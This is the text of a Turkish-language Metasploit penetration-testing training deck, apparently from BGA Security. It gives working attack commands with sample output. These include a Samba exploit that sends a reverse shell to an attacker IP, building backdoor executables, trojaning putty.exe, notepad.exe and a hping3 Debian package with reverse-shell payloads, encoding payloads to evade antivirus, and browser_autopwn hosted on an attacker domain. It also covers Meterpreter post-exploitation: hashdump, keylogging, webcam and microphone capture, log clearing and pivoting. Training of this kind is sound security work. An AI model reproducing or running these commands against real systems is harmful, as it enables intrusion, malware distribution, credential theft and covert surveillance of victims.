Geçerli	exploit	için	kullanılabilir	payload’ları	listelemek	için,	“show	payloads”	komutu	kullanılır.
@BGASecurity
BGA	|	MetasploitMsfconsole |	Payload Seçimi
“info”	komutu	istenilen	payload,exploit	hakkında	detaylı	bilgi	alanabilir.	
Örnek	olarak	“infowindows/vncinject/reverse_tcp”		komutu	VNC	Inject	payloadı	hakkında	detaylı	bilgi	
sunar.
@BGASecurity
BGA	|	MetasploitMsfconsole |	Payload Seçimi
“İnfo” komutu	ile	seçilen	payload	için	gerekli	seçenekler	ve	varsayılan	olarak	atanan	değerler	listelenir.
Payload	seçimi	için		“set PAYLOAD	payload_adı”	komutu	kullanılır.	Örnekte	kullandığımız	VNC	Inject	
payloadı	için	bu	komut	 “set	PAYLOAD	windows/vncinject/reverse_tcp”	şeklinde	olucaktır.
@BGASecurity
BGA	|	MetasploitMsfconsole |	Seçenekler
• Seçeneklerin	Ayarlanması	Exploit	ve	payload	seçiminden	sonra,	uygulanacak	hedef	ve	gerekli	seçenekler	
belirtilmelidir.
• Exploit	ve	Payload	seçeneklerini	“show	options”	komutu	ile	görüntüleyebiliriz.
@BGASecurity
BGA	|	MetasploitMsfconsole |	Seçenekler
Required sütününda	“yes”	ile	belirtilen	seçeneklerin	mutlaka	belirtilmesi	gerekir.
Bu	ayarlar	şöyle	yapılır	;
• RHOST	= hostname veya	ip	adresi	yazılabilir
• LHOST	= saldırıyı	yapan	sistemin	ip	adresi.	
• LPORT		= Hedef	ile	iletişim	kurulacağı	yerel	port.
Firewall	,	IDS/IPSleri atlatmak	için	443.	portu	kullanmanız	önerilir.	LPORT ile	belirticeğiniz	portun	
sisteminizde	açık	ve	filtrelenmemiş	olması	gerekir.
@BGASecurity
BGA	|	MetasploitMsfconsole |	Exploit
@BGASecurity
BGA	|	MetasploitMsfconsole |	Exploit Sonrası
• Exploitin sonrası	VNC	ekran	görüntüsü
@BGASecurity
BGA	|	MetasploitMsfcli
• Msfcli	aracı,	unix	ve	windows	sistemler	için	komut	satırından	çalışan	msfconsole	benzeri	bir	arayüzüdür.Özellikle	scripting	
işlemlerinde	sıkça	tercih	edilir.
• Msfcli	ile	gerekli	parametreler	kullanılarak	istenilen	exploit	hedefe	gönderilir.
Msfcli arayüzünün kullanım	parametreleri	ve	açıklamaları	aşağıdaki	gibidir.
Kullanımı	:	./msfcli <exploit_adi>	<seçenek=değer>	[parametre]
Parametre	 Açıklama
-------------- -----------
(H)elp Yardım	komutu
(S)ummary Seçilen	exploit hakkında	bilgi	verir
(O)ptions Seçilen	exploit için	gerekli	seçenekleri	listeler
(A)dvanced Seçilen	exploit için	gelişmiş	seçenekleri	listeler
(I)DS	Evasion IDS	yakalanmamak	için	kullanılabilir	seçenekleri	listeler.
(P)ayloads Seçilen	exploit için	kullanılabilir	payloadları listeler
(T)argets Exploitin uygulanabileceği	hedefleri	listeler
(AC)tions Seçilen	exploit ile	birlikte	kullanılabilecek	yardımcı	araçları	listeler
(C)heck Exploitin hedef	sisteme	uygunluğunu	çek	eder
(E)xecute Seçilen	exploiti çalıştırır
@BGASecurity
BGA	|	MetasploitMsfcli
Msfcli kullanılarak	bir	hedefi	istismar	etmek	için	kullanılacak	en	basit	yol;
1. ./msfcli <exploit_adı>	S			=	Seçilen	exploit hakkında	bilgi	verir.
2. ./msfcli <exploit_adı>	P		=	Seçilen	exploit için	kullanılabilir	payloadları listeler.
3	. ./msfcli <exploit_name>	PAYLOAD=<payload_adı>	O		=	Exploit için	gerekli	seçenekleri	listeler
4.	 ./msfcli <exploit_name>	PAYLOAD=<payload_adı>	T			=	Exploitin uygulanabileceği	hedefler
5. Kullanılacak	exploitler için	seçenekleri	ve	değerlerini	belirttikden sonra	E	parametresi	ile	exploit
çalıştırılır.
@BGASecurity
BGA	|	MetasploitMsfcli
• Exploit Seçimi	ve	Seçeneklerin	Görüntülenmesi
#	msfcli exploit/multi/samba/usermap_script O
@BGASecurity
BGA	|	MetasploitMsfcli
• Exploit için	kullanılabilir	payload’ların listesi
#	msfcli exploit/multi/samba/usermap_script P
@BGASecurity
BGA	|	MetasploitMsfcli
• Seçeneklerin	belirtilmesi	ve	exploitin uygulanması
#	msfcli exploit/multi/samba/usermap_script
PAYLOAD=generic/shell_reverse_tcp LHOST=6.6.6.112
RHOST=linux.bga.com.tr	RPORT=139	E
linux.bga.com.tr	adresine,	samba	exploitini	uygula	ve	shell_reverse	payloadını	yükleyip	
6.6.6.112	adresine	komut	satırını	ilet.
@BGASecurity
BGA	|	MetasploitMsfcli
@BGASecurity
BGA	|	MetasploitMsfpayload
• Msfpayload aracı,	metesploitde kullanılan	payloadları derlemek	için	kullanılır.
• Exploit geliştiricileri	exploit yazarken,	payloadlarada ihtiyaç	duyarlar	bu	noktada	msfpayload exploit
geliştiricileri	için	bulunmaz	nimettir.
• Metasploit’in msfpayload aracı	sayesinde	istenilen	payloadın çıktısı		C	,	Perl,	Ruby,	Raw,	Javascript,	VBA	ve	
exe olarak	alınabilir.
@BGASecurity
BGA	|	MetasploitMsfpayload
msfpayload		-h parametresi	ile	temel	kullanımını,seçeneklerini	ve	payloadları	görebilirsiniz.
Kullanımı:
@BGASecurity
BGA	|	MetasploitMsfpayload
Kullanılabilir	payload’ları listelemek
@BGASecurity
BGA	|	MetasploitMsfpayload
Payload Seçeneklerini	Görüntülemek
@BGASecurity
BGA	|	MetasploitMsfpayload
Seçenekler	listesinde	“Required”bölümündeki	alanlar	mutlaka	doldurulmalıdır.	
Bazı	seçenekler	varsayılan	olarak	tanımlı	gelmektedir.
@BGASecurity
BGA	|	MetasploitMsfpayload
Seçenekleri	Belirlemek
Payload	seçeneklerini	belirlemek	oldukça	basittir,	aşağıdaki	örnekde	olduğu	gibi	söz	dizimi	kullanarak	ayarlar	
belirlenebilir.
@BGASecurity
BGA	|	MetasploitMsfpayload
@BGASecurity
BGA	|	MetasploitMsfpayload
Farklı	dillerde	shellcode	oluşturmak	Payloadın	farklı	formatlarda	shellcode	çıktısını	alabiliriz,
örneğin;	C,Perl,raw,java,js vb.
@BGASecurity
BGA	|	MetasploitMsfpayload
Payload Derlemek
Windows	sistemlerde	çalışacak	şekilde	çalıştırılabilir,	exe dosyası	oluşturalım.
msfpayload windows/shell_bind_tcp EXITFUNC=seh
LPORT=1234	X	>	backdoor.exe
@BGASecurity
BGA	|	MetasploitMeterpreter
• Meterpreter ,	Meta-Interpreter ‘in	kısaltılmışıdır.
• Modül	destekli	üst	düzey	bir	payload’tır.	
• Açık	kaynak	kodlu	kolayca	geliştirilebilir,	kendi	eklentilerinizi	geliştirmenize	izin	verir	ve	DLL	olarak	yeni	
modüller	eklenebilir.
• Meterpreterin	çalıştığı	sistemlerde	anti-virüs	yazılımları,	nids	tarzı	yazılımlardan	korunmak	için	içerik	
dahili	kriptolama	özelliği	mevcuttur.
@BGASecurity
BGA	|	MetasploitMeterpreter
• MSF	3.x	ile	birlikte	yeni	gelen	;	
• Süreç	birleştirme,	IRB	script	desteği	,Timestomp	ve	SAM	HashDump	özellikleri	mevcut.	Meterpreter	yeni	bir	
alt	süreç	olarak	doğrudan	bellekte	çalışıyor	bu	sayede	hacking	sonrası	kurban	bilgisayarda	iz	bırakmaz	ve		
adli	delil	toplamada	saldırıya	dair	iz	bulunması	zorlaşır.
• Meterpreter	de	esnekliği	ve	kullanım	kolaylığı	olan	bir	dizi	komut	ve	eklenti	bulunuyor.
@BGASecurity
BGA	|	MetasploitMeterpreter
Varsayılan	Meterpreter	Komutları	;
Komut	 Açıklama
-------- ------------
use Bir	veya	daha	fazla	eklenti	yüklemek	için	kullanılır.
loadlib İstismar	sürecinde	yeni	bir	kütüphane	yüklenebilir.	
read Uzak	sistemden	veri	okur
write Uzak	sisteme	geçerli	kanal	üzerinden	veri	yazar
close Kanalı	kapatır.
interact Kanalda	interaktif	bir	oturum	başlatır.
initcrypt İstemci	ve	sunucu	arasındaki	iletişim	için	bir	keyfi	şifreleme	algoritması		oluşturur.
? Yardım	neüsü
background Geçerli	oturumu	arkaplana	gönder
bgkill Arkaplanda	çalışan	meterpreter	scriptini	öldür
bglist Arkaplanda	çalışan	scriptleri	listele
bgrun Meterpreter	scriptini	arkaplanda	çalıştır
channel Aktif	oturum	hakkında	bilgi	ver.
close Aktif	oturumu	kapat
detach Meterpreter	oturumunu	sonlandır	(http/https	için)
disable_unicode_encoding unicode	strings	kodlamasını	kapat
enable_unicode_encoding unicode	strings	kodlamasını	aç
exit Tüm	meterpreter	oturumlarını	sonlandır.
@BGASecurity
BGA	|	MetasploitMeterpreter |	Temel	Komutlar	II
Temel	Komutlar
=============
Komut		 Açıklama
------- -------------
help Yardım	menüsü
info Bir	post	module	hakkında	bilgi	ver
interact Kanal	ile	etkileşim
irb irb	script	moduna	geç
load meterpreter	scriptlerini	yükle
migrate Bir	başka	prosese	bulaş
quit meterpreter	oturumunu	sonlandır
read Oturumdan	veri	oku
resource Dosyadan	komut	dizisi	al
run Meterpreter	script	veya	post	modülü	çalıştır
use ‘load’	komutu	ile	aynıdır.
write Kanal	üzerinden	bir	veri	yazar.
@BGASecurity
BGA	|	MetasploitMeterpreter |	Dosya	Sistemi	Komtuları
Stdapi:	Dosya	Sistemi	Komutları
============================
Komut					 Açıklama
------- -----------
cat Dosyanın	içeriğini	ekrana	okur
cd Dizin	değiştirir
del Dosya	siler
download Bir	dosya	veya	dizin	indirir
edit Dosya	düzenler
getlwd Yerel	çalışma	dizinini	gösterir
getwd Çalışma	dizinini	gösterir
lcd Yerel	çalışma	dizinini	değiştirir
lpwd Yerel	çalışma	dizinini	gösterir
ls Dosyaları	listeler
@BGASecurity
BGA	|	MetasploitMeterpreter |	Dosya	Sistemi	Komtuları II
Stdapi:	Dosya	Sistemi	Komutları
============================
Komut						 Açıklama
------- -----------
mkdir Dizin	yaratma
pwd Çalışma	dizinini	göster
rm Bir	dosyayı	sil
rmdir Dizin	sil
search Dosyaları	arar
upload Bir	dosya	veya	dizin	yükle
@BGASecurity
BGA	|	MetasploitMeterpreter |	Ağ	Komutları
Ağ	Komutları
===========================
Komutlar							 Açıklama
------- -----------
ipconfig Ağ	ayarlarlarını	görüntüler
portfwd Yerel	portu uzak	bir	servise	yönlendirir
route Yönlendirme	tablosunu	görüntüler	ve	değiştirir
@BGASecurity
BGA	|	MetasploitMeterpreter |	Sistem	Komutları
Sistem	Komutları
=======================
Komutlar							Açıklama
------- -----------
clearev Olay	loglarını	temizle
drop_token Herhangi	bir	etkin	kimliğe	bürünme	belirteci	bırakır.
execute Komut	çalıştırır
getpid Geçerli	proses	tanımlayıcısını	göster.
getprivs Yetki	yükseltme	komutlarını	göster
getuid Sunucuda	çalışan	kullanıcıyı	göster
kill Bir	prosesi	öldür
ps Çalışan	prosesleri	listele
@BGASecurity
BGA	|	MetasploitMeterpreter |	Sistem	Komutları	II
Sistem	Komutları
=======================
Komutlar							 Açıklama
------- -----------
reboot Uzak	bilgisayarı	reboot	et
reg Uzak	registery	ayarlarını	değiştir.
rev2self Uzak	bilgisayar	üzerinde		RevertToSelf()	arar
shell Sistem	komut	satırına	geç
shutdown Uzak	sistemi	kapat
steal_token Hedef	proses	yetkilerine	geçiş	yapar
sysinfo Uzak	sistem	hakkında	detaylı	bilgi	alır
@BGASecurity
BGA	|	MetasploitMeterpreter |	Kullanıcı	Arayüzü Komutları
Kullanıcı	Arayüzü Komutları
===============================
Komut	 Açıklama
-------- -----------
enumdesktops Erişilebilir	tüm	masaüstlerini	göster
getdesktop Geçerli	meterpreter	masaüstünü	göster
idletime Boş	vakti	gösterir
keyscan_dump Klavye	girişlerini	dump	et
keyscan_start Klavye	girişlerini	dinlemeye	başla
keyscan_stop Klavye	girişlerini	dinlemeyi	durdur
screenshot Masaüstünün	ekran	görüntüsünü	al
setdesktop Meterpreter	geçerli	masaüstünü	değiştir.
uictl Bazı	kullanıcı	arabirimi	bileşenlerini	denetler
@BGASecurity
BGA	|	MetasploitMeterpreter |	Webcam Komutları
Webcam Komutları
=======================
Komut							Açıklama
------- -----------
record_mic Mikrofonu	X	saniye	kadar	dinle
webcam_list Webcamlerin listesini	ver
webcam_snap Webcamden görüntü	al
@BGASecurity
BGA	|	MetasploitMeterpreter |	Yetki	Yükseltme	Komutları
Priv:	Yetki	Yükseltme	Komutları
======================
Komut			 Açıklama
------- -----------
getsystem Yerel	yetki	yükseltme	tekniklerini	uygula
@BGASecurity
BGA	|	MetasploitMeterpreter |	Şifre	Veritabanı	Komutları
Şifre	Veritabanı	Komutları
================================
Komut Açıklama
--------- -----------
hashdump SAM	database in	içeriğini	görüntüler
@BGASecurity
BGA	|	MetasploitMeterpreter |	Timestomp Komutları
Timestomp Komutları
========================
Komut						 Açıklama
-------- -----------
timestomp Dosya/Dizin	izinlerini	değiştir
@BGASecurity
BGA	|	MetasploitVNC	DLL	Inject
VNC	DLL	Inject
• Üst		düzey	payloadlardan	biride	VNC	DLL	enjeksiyonudur.	RealVNC	kodunda	değişiklik	yapılarak	oluşturulmuştur.
• Dış	dosya,	kütüphane,	servis	kurulumu	veya	registry anahtarı	gerektirmiyor.
• Hedef	exploit	edildikden	sonra	vnc	dll	hedefe	upload	edilir	ve	tetiklenerek	hedefin	ekranı	masaüstümüze	taşınır	ve	
sanki	hedef	bilgisayarın	başındaymışız	gibi	o	bilgisayarı	kontrol	edebiliriz.
Bu	payloadı	farklı	bir	örnekle	inceleyelim.	Hedefin	güvenlik	zafiyeti	olan	servisini	exploit	ederek		VNC	DLL	enjekte	edip	
işlevselliğine	bakalım.
Oturumu	kilitli	bir	sisteme	giriş	için;
net	user	<kullanıcı	adı>	<şifre>	/add	
net	localgroup	administrators	<kullanıcı	adı>	/add
@BGASecurity
BGA	|	MetasploitVNC	DLL	Inject
Yeni	Administrators Kullanıcısı	Ekleme
@BGASecurity
BGA	|	MetasploitPassiveX
Metasploit Framework’de bulunan	üst	düzey	payload’lardan bir	diğeride PassiveX dir.
Hedef	sistem	bir	Firewall	arkasındaysa	ve	firewall	http	protokolünü	bloklamadıysa fakat	Nat yapıyorsa	
hedefe	yönelik	bağlantı	girişimi	başarısız	olacaktır.	Bu	noktada	PassiveX payloadı kullanılarak	http	
protokolü	üzerinden	ters	bağlantı	yapılarak	firewall	aşılır	ve	hedef	ile	oturum	kurulur.
PassiveX payloadı ile	süreç	şöyle	başlar;
- PassiveX payload’ı ile	hedefin	registry kaydı	değiştirilir	ve	İnternet	Explorer	başlatılır.
- İstenen	DLL	,	ActiveX objesi	olarak	yüklenir.
- Tüm	iletişim	http	protokolü	üzerinden	yapılır.
- Meterpreter ve	VNC	DLL		injection injection için	kullanılabilir.
@BGASecurity
BGA	|	MetasploitPassiveX
PassiveX Payloadları
İsim	 Açıklama
-------- ------------
windows/exec/reverse_http Tunnel	communication	over	HTTP	and	executean	arbitrary		command
windows/shell/reverse_http Tunnel communication	over	HTTP	and	spawn		piped		command	shell
windows/meterpreter/reverse_http Tunnel communication over HTTP	and inject the meterpreter server	DLL
windows/upexec/reverse_http Tunnel communication over HTTP	and uploadan executable and runs it
windows/vncinject/reverse_http Tunnel	communication	over	HTTP	and	inject	the	VNC	server	DLL	and	run	it	
from	memory
@BGASecurity
BGA	|	MetasploitMsfencode
Msfencode,	istenilen	payloadın	içeriğini	değiştirerek	Kaçak	Giriş	Tespit	ve	Engelleme	Sistemleri	
(IDS/IPS),		Güvenlik	Duvarları	(Firewall)	ve	Antivirüsler	tarafından	tanınmasını	
engeller/zorlaştırır.
Metasploit Frameworkde	27+	encoder	bulunuyor.Encoderları	listelemek	için	-l	paramatresi	diğer	
seçenekler	için	–h	parametresi	kullanılır.
@BGASecurity
BGA	|	MetasploitMsfencode
• Msfencode Kullanım	Parametreleri
@BGASecurity
BGA	|	MetasploitMsfencode
Encoder Listesi
@BGASecurity
BGA	|	MetasploitMsfencode
• Encoder Kullanımı
• Shellcode’u msfpayload ile	raw formatında	msfencode a	aktarıp	içeriği	encode edebilirsiniz.
Metasploit’de bulunan	güçlü	encoder’lar ile	içerik	antivirus,	content fitler,	ids/ips sistemleri	tarafından	
tanınmaz	hale	getirilebilir.
#	msfpayload windows/meterpreter/reverse_tcp LHOST=6.6.6.112
LPORT=4443	R	|	msfencode -e	x86/shikata_ga_nai -t	exe -o
/var/www/payload.exe
@BGASecurity
BGA	|	MetasploitMsfencode
• Multi-Encoder Kullanımı
• Payload içeriği	bir	çok	encoder ile	değiştirilerek	yeniden	oluşturulabilir.
#	msfpayload windows/meterpreter/reverse_tcp LHOST=6.6.6.112
LPORT=4443	R	|	msfencode -e	x86/shikata_ga_nai -c	5	-t	raw |
msfencode -e	x86/alpha_upper -c	2	-t	raw |	msfencode –e
x86/shikata_ga_nai -c	5	-t	raw |	msfencode -e	x86/countdown -c	5	–t
exe -o	/var/www/payload2.exe
[*]	x86/shikata_ga_nai succeeded with size	317	(iteration=1)
[*]	x86/shikata_ga_nai succeeded with size	344	(iteration=2)
[*]	x86/shikata_ga_nai succeeded with size	371	(iteration=3)
…..
@BGASecurity
BGA	|	MetasploitMsfrpcd
Msfrpcd,	msfconsole arayüzünün bir	yardımcı	aracıdır.Belirtilen	ip	adresi	ve	portu	dinleyerek	gelen	bağlatıları kabul	
eder.Böylelikle	uzak	sistemden	bir	veya	birden	fazla	kullanıcının	bağlantı	kurup	metasploit framework ü	kullanmasına	
olanak	sağlar.
Msfrpcd seçeneklerini	görüntülemek için		-h parametresini	kullanabilirsiniz.
@BGASecurity
BGA	|	MetasploitMsfrpcd
Msfrpcd Seçenekleri
@BGASecurity
BGA	|	MetasploitClient-Side	Saldırı	Yöntemleri
Bu	bölümün	amacı,	son	kullanıcıya	yönelik	güncel	tehditlerin	uygulamalar	eşliğinde	anlaşılmasıdır.
@BGASecurity
BGA	|	MetasploitClient-Side	Saldırı	Yöntemleri	|	İçerik
1. Browser	Tabanlı Açıklıklar
2. Binary	Payloadlar
3. Antivirüsleri Atlatmak
4. Linux	Binary	Trojan
5. Java	Uygulamalarını Bulaştırmak
6. File	Format	Exploitler
7. VBScript	Enjekte Yöntemleri
@BGASecurity
BGA	|	MetasploitBrowser	Tabanlı Açıklıklar
• Bir	browser	exploiti,	kötü	amaçlı	geliştirilmiş	zararlı	kod	parçasıdır.
• Kullanıcının	bilgisi	olmadan,	bilgisayarına	zararlı	yazılım	bulaştırmak	veya	izinsiz/yetkisiz	değişikliklerde	
bulunmak	için	kullanılır.
• Zararlı	kod;	HTML,	Image,	Java,	Javascript,	ActiveX veya	başka	bir	web	teknolojisi	olabilir.
• Zayıflıklar,	browser	teknolojisinden	veya	eklentilerinden	kaynaklanabilir
@BGASecurity
BGA	|	MetasploitBrowser	Tabanlı Açıklıklar
Internet	Explorer	CSS	IMPORT
@BGASecurity
BGA	|	MetasploitBrowser	Autopwn
• Browser	tabanlı	açıklıkları	otomotize eder
• Useragent bilgisine	göre	ilgili	exploit ve	payloadı oluşturur
@BGASecurity
BGA	|	MetasploitBrowser	Autopwn
Browser	Autopwn;	Firefox,	IExplorer,	Chrome,Opera
msf >	use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn)	>	set	LHOST	saldirgan.com
LHOST	=>	85.95.238.172	
msf auxiliary(browser_autopwn)	>	set	SRVPORT	80
SRVPORT	=>	80	
msf auxiliary(browser_autopwn)	>	set	URIPATH	/pwd
URIPATH	=>	/pwd
msf auxiliary(browser_autopwn)	>	exploit
[*] --- Done,	found 23 exploit modules
[*] Using URL:	http://0.0.0.0:80/pwd
[*] Local IP:	http://saldirgan.com	:80/pwd
@BGASecurity
BGA	|	MetasploitBrowser	Autopwn
Meterpreter
Oturumlarının	Listesi
@BGASecurity
BGA	|	MetasploitBinary	Payloadlar
• Metasploit'de bulunan	payload'ları çalıştırılabilir	hale	getirip,	exploit ihtiyacı	olmaksızın	sisteme	
bulaştırmak	mümkündür.
• #	./msfpayload windows/shell_reverse_tcp LHOST=192.168.5.99	LPORT=4443		X	>	/tmp/reverse.exe
@BGASecurity
BGA	|	MetasploitBinary	Payloadlar
Dinleme	Modu
#	msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp
LHOST=6.6.6.112	LPORT=4443	E
PAYLOAD	=>	windows/shell_reverse_tcp
LHOST	=>	6.6.6.112
LPORT	=>	4443
[*]	Started reverse handler on	6.6.6.112:4443
[*]	Starting the payload handler..
2	+0200
Microsoft	Windows	[Version	6.1.6801]
Copyright	(c)	2006	Microsoft	Corporation.		All	rights	reserved.
C:UsersozanusDesktop>
@BGASecurity
BGA	|	MetasploitBinary	Payloadlar
Varolan bir	exe’yi backdoorlamak.
Örnek	Uygulama	Putty
1. wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
2. msfpayload windows/meterpreter/reverse_tcp LHOST=6.6.6.112	LPORT=443	R	|	msfencode -e	x86/shikata_ga_nai
-c	3	-t	exe -x	/var/www/putty.exe -o	/var/www/puttyx.exe
3. msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=6.6.6.112	LPORT=443	E
Not:	Orijinal	program	korunsun	isteniliyorsa,	-k	parametresi	kullanılır.
@BGASecurity
BGA	|	MetasploitAntivirüsleri	Atlatmak
• Antivirusler	nasıl	çalışır	?
• İmza	tabanlı	zararlı	analizi
@BGASecurity
BGA	|	MetasploitAntivirüsleri	Atlatmak
• Template Kullanımı
• msfpayload windows/meterpreter/reverse_tcp LHOST=6.6.6.112	LPORT=2222	R	|	msfencode -t	exe -x	
notepad.exe -k	-o	notepad2.exe -e	x86/shikata_ga_nai -c	5
• Antivirus tarama	sonucu
@BGASecurity
BGA	|	MetasploitAntivirüsleri	Atlatmak
Notepad.exe dosyasının	imzasını	taklit	etmiş	olduk,	
son	oluşturduğumuz	notepadplus.exe	reverse	shell	dosyasının	özellikleri
@BGASecurity
BGA	|	MetasploitLinux	Binary	Trojan
• mkdir siginak;cd siginak
• apt-get --download-only install hping3
• mv /var/cache/apt/archives/hping3_20051105-bt2_i386.deb .
• dpkg -x	hping3_20051105-bt2_i386.deb work
• mkdir work/DEBIAN
• cat >	work/DEBIAN/contol
Package:	hping3
Version:	3.1.1
Section:	Packet Generator
Priority:	optional
Architecture:	i386
Maintainer:	Ubuntu MOTU	Developers (ubuntu-motu@lists.ubuntu.com)
Description:	Cok dehset paket	gonderen versiyonudur.
@BGASecurity
BGA	|	MetasploitLinux	Binary	Trojan
• cat >	work/DEBIAN/postinst
#!/bin/sh
sudo chmod 2755	/usr/sbin/hping3	&
• #	msfpayload linux/x86/shell/reverse_tcp LHOST=6.6.6.112	LPORT=4443	X	>	work/usr/sbin/hping3
Created by msfpayload (http://www.metasploit.com).
Payload:	linux/x86/shell/reverse_tcp
Length:	50
Options:	{"LHOST"=>"6.6.6.112",	"LPORT"=>"4443"}
• chmod 755	work/DEBIAN/postinst
• dpkg-deb --build work
• mv work.deb hping3.deb
• msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=6.6.6.112	LPORT=4443	E
@BGASecurity
BGA	|	MetasploitLinux	Binary	Trojan
@BGASecurity
BGA	|	MetasploitFile	Format	Exploit
Adobe Reader
msf >	use exploit/windows/fileformat/adobe_geticon
msf exploit(adobe_geticon)	>	set	FILENAME	belge.pdf
FILENAME	=>	belge.pdf
msf exploit(adobe_geticon)	>	exploit
[*] Creating 'belge.pdf'	file...
[+] belge.pdf stored at	/var/www/belge.pdf
@BGASecurity
BGA	|	MetasploitFile	Format	Exploit
Microsoft	Word	RTF pFragments Stack	Buffer	Overflow	(File	Format)
• Microsoft	office 2010,	2007	ve	2003	sürümlerini	etkileyen	ve	gelişi	güzel	kod	çalıştırmayı	sağlayan	açıklık.
@BGASecurity
BGA	|	MetasploitExploit	Sonrası Sistemde İlerleme
Post	exploitation olarak	da	adlandırılır.
Amaç	herhangi	bir	güvenlik	zafiyeti	kullanarak	sisteme	gerçekleştirilen	yetkisiz,	düşük	yetkili	bir	kullanıcı	
haklarıyla	sistemi	ele	geçirme,	sistemi	ara	geçit	olarak	kullanarak	başka	sistemlere	atlama.
Bu	bölüm,	exploit sonrası	uzak	sistemde	ilerleme,gizleme	ve	kayıtları	silme	yöntemlerinin	anlaşışması ve	
uygulanmasını	içerir.
@BGASecurity
BGA	|	Metasploitİçerik
1. Yetki Yükseltme
2. Hashdump
3. Parola Kırma (jonh the	ripper)
4. Başka Bir Uygulamaya Bulaşmak
5. Pivoting
6. Memorydump
7. Uzak Masaüstü Bağlantısı Başlatmak
8. Hedefin Canlı Oturumuna Geçiş
9. İz Temizleme
10. Trafik Dinleme (Packet	Sniffing)
11. Ekran Görüntüsü Yakalama
12. Ses,	Webcam	Görüntüsünü Yakalama
@BGASecurity
BGA	|	MetasploitYetki Yükseltme
Hedef	sistem,	kisitli kullanici yetkileri	ile	ele	geçirildiginde yetki	yükseltmek	ve	
farkli kullanici yetkilere	geçiş	yapmak.
@BGASecurity
BGA	|	MetasploitYetki Yükseltme
meterpreter >	getsystem
Local privilege escalation teknikleri	ile	SYSTEM	yetkilerine	yükseltir.
meterpreter >	getsystem -t	1
…got system (via technique 1).
meterpreter >	getuid
Server	username:	NT	AUTHORITYSYSTEM
@BGASecurity
BGA	|	MetasploitYetki Yükseltme
meterpreter >	getsystem -h
Usage:	getsystem [options]
Attempt to elevate your privilege to that of	local system.
OPTIONS:
-h	Help Banner.
-t	The technique to use.	(Default to ‘0ʹ).
0	:	All techniques available
1	:	Service	– Named Pipe Impersonation (In Memory/Admin)
2	:	Service	– Named Pipe Impersonation (Dropper/Admin)
3	:	Service	– Token Duplication (In Memory/Admin)
4	:	Exploit – KiTrap0D	(In Memory/User)
@BGASecurity
BGA	|	MetasploitHasdump
Windows	sistemlerde	SAM	database’inden kullanıcı	hesaplarını	ve	LM/NTML	password hashlerini alır.
@BGASecurity
BGA	|	MetasploitPassword Cracking |	John	The Ripper
@BGASecurity
BGA	|	MetasploitMigrate
• Meterpreter ajanı	çalışan	başka	bir	uygulamaya	kendini	bulaştırabilir	ve	o	uygulama	üzerinden	yetkisiz	
işlevler	gerçekleştirebilir.
• Uygulamaya	bulaştığında	uygulamanın	boyutu	değişmez
• Antivirus,	Antilogger bypass	için	tercih	edilir.
• Proxy	Auth.	Bypass	etmek	için	kullanılır.
@BGASecurity
BGA	|	MetasploitMigrate
• Kullanımı
meterpreter >	migrate
Usage:	migrate pid
• “ps”	komutu	ile	çalışan	processlerin id si	öğrenilebilir.
meterpreter >	ps
PID		 Name													Arch Session User																										 Path
--- ---- ---- ------- ---- ----
860			explorer.exe				 x86	 1								 pentestlabsozanus C:WindowsExplorer.EXE
@BGASecurity
BGA	|	MetasploitMigrate
meterpreter >	migrate	860
[*]	Migrating	to	860...
[*]	Migration	completed	successfully.
meterpreter >	getuid
Server	username:	pentestlabsozanus
@BGASecurity
BGA	|	MetasploitPivoting
• Uzak	ağı,	dış	dünyaya	açmak	için	kullanılır.
• Firewall/NAT	veya	Router arkasındaki	sistemlere	erişmek	için	tercih	edilir.
• Port yönlendirme	yapılabilir.
• Uzak	ağ	ile	VPN	tuneli kurulabilir.
@BGASecurity
BGA	|	MetasploitPivoting |	Portfwd
@BGASecurity
BGA	|	MetasploitPivoting |	Portfwd
meterpreter >	portfwd -h
Usage:	portfwd [-h]	[add |	delete |	list |	flush]	[args]
OPTIONS:
-L	<opt>		The local host to listen	on	(optional).
-h								Help banner.
-l	<opt>		The local port to listen	on.
-p	<opt>		The remote port to connect to.
-r	<opt>		The remote host to connect to.
meterpreter >		portfwd add -l	3389	-p	3333	-r	127.0.0.1
[*]	Local TCP	relay created:	0.0.0.0:3389	<->	127.0.0.1:3333
@BGASecurity
BGA	|	MetasploitPivoting |	Route
• Uzak	ağdaki	diğer	ip	adreslerine	erişmek	için	kullanılır.
• VPN	tuneline benzetilebilir.
@BGASecurity
BGA	|	MetasploitPivoting |	Route
msf >	route -h
Usage:	route [add/remove/get/flush/print]	subnet netmask [comm/sid]
Route traffic destined to a	given subnet through a	supplied session.
The default comm is	Local.
msf >	route add 1.1.1.0	255.255.255.0	1
[*]	Route added
msf >	route print
Active Routing Table
====================
Subnet													 Netmask				 Gateway
------ ------- -------
1.1.1.0												255.255.255.0						 Session	1
@BGASecurity
BGA	|	MetasploitUzak	Masaüstü	Bağlantısı
Hedef	sistemin	uzak	masaüstü	servisini	(rdp)	aktif	etmek	ve	yetkili	bir	rdp kullanıcı	eklenerek	uzak	sistem	ele	geçirilebilir.
@BGASecurity
BGA	|	MetasploitHedefin	Canlı	Oturumuna	Geçiş
VNC	ile	hedefin	canlı	oturumuna	geçiş
@BGASecurity
BGA	|	Metasploitİz	Temizleme
Windows	Loglarını Silme
@BGASecurity
BGA	|	MetasploitTrafik	Dinleme	(Packet Sniffing)
• Exploiting	sonrası	hedef	sistemde	ilerleme	aşamasında	trafik	kayıtları	önemli	veriler	içerebilir.
• Uzak	bir	sistem	ele	geçirildiğinde,	hedef	sistemde	ilerlemek	için	elde	edilecek	kritik	verilerden	biride	
network	trafiğidir.	
• Ele	geçirilen	sistemin	üzerinden	ftp,http,smtp,pop3	vb.	trafiği	akıyor	ve	şifre	içeriyor	olabilir.	Meterpreter	
ajanının	sniffing	özelliği	ile,	uzak	sistemin	ağ	kartını	dinleyerek	trafiği	kaydedebilirsiniz.
@BGASecurity
BGA	|	MetasploitTrafik	Dinleme	(Packet Sniffing)
meterpreter >	use sniffer
Sniffer Komutları
================
Command	 Description
------- -----------
sniffer_dump	 Retrieve	captured	packet	data	to	PCAP	file
sniffer_interfaces	 Enumerate	all	sniffable	network	interfaces
sniffer_start	 Start	packet	capture	on	a	specific	interface
sniffer_stats	 View	statistics	of	an	active	capture
sniffer_stop	 Stop	packet	capture	on	a	specific	interface
@BGASecurity
